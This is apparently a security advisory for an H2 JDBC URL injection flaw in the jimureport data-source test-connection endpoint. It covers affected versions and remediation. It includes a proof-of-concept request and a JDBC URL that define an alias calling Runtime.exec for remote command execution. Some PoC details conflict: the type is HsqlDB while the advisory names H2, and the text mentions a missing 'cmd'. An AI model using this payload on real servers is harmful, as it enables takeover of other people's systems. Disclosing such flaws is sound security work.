### Vulnerability Overview The `/drag/onDragDatasource/testConnection` endpoint in the jimureport BI Dashboard data source management module contains a Remote Code Execution (RCE) vulnerability. This endpoint fails to validate dangerous H2 database parameters. Attackers can execute arbitrary Java code during database connection establishment by crafting a malicious H2 JDBC URL containing an `INIT` parameter. The previous fix for DB2 injection did not address this H2 JDBC injection issue. ### Affected Versions Affected versions: ≤ v2.3.0 ### Remediation This vulnerability has been fixed in subsequent versions (Issue status is Closed, user jeecg commented "Modified, will be updated in the next version"). Users are advised to upgrade to the patched version. ### POC Code ```json { "name": "test", "type": "HsqlDB", "driver": "org.hsqldb.jdbc.JDBCDriver;INIT=CREATE ALIAS IF NOT EXISTS EXEC AS 'void exec(String c) throws Exception { Runtime.getRuntime().exec(c); }';", "url": "jdbc:hsqldb:hsql://127.0.0.1/jimureport", "username": "aaa", "password": "..." } ``` Linux payload (replace `cmd` with `sh -c`): ``` jdbc:h2:mem:exploit_db;INIT=CREATE ALIAS IF NOT EXISTS EXEC AS 'void exec(String c) throws Exception { Runtime.getRuntime().exec(c); }'; ```